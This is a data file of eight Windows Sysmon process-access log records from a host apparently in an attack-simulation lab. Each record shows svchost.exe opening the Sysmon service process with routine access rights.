{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1586,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1587,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1588,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1589,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1590,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1591,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1592,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1593,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
